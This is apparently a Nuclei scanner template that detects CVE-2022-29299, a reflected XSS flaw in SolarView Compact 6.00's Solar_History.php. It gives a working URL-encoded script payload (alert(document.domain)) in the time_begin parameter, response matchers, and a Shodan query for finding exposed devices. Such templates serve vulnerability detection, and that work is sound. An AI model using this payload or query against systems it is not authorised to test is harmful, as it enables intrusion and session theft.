id: CVE-2022-29299 info: name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting author: For3stCo1d severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://www.exploit-db.com/exploits/50967 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cve-id: CVE-2022-29299 epss-score: 0.00175 epss-percentile: 0.5456 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:-244067125 tags: cve2022,cve,xss,solarview,edb http: - method: GET path: - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6' matchers-condition: and matchers: - type: word part: body words: - '<"">' - '/Solar_History.php" METHOD="post">' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4a0a0047304502207e67b78e313a0854050364c2e1cfe560e6122b0856e62f96e2084eef42c310af022100e7cf9ab5f3c28655a5ef30b6f0781cd53f721750c1efbe1ded28d9ef3c04ee03:922c64590222798bb761d5b6d8e72950